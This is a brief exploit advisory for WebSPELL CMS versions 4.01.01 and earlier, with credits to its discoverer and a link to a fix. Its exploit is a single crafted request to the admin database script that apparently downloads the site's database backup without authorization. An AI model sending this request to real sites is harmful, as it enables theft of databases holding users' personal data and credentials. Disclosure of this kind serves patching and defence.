WebSPELL versions 4.01.01 and below suffer from a direct database backup download vulnerability.
a8475b0aa1a3ddb9e555dd6ceac71b82e265daf554c9b434a7e36ca8203704f7
# WebSPELL <= 4.01.01 Accessible Database Backup Download Exploit
# Discovered by: Trex
# Visit: www.SecuritySector.org / www.UnderGround.ag
# Exploit:
http://[SITE]/[PATH]/admin/database.php?action=write&userID=1
# Solution:
http://cms.webspell.org/index.php?site=files&file=15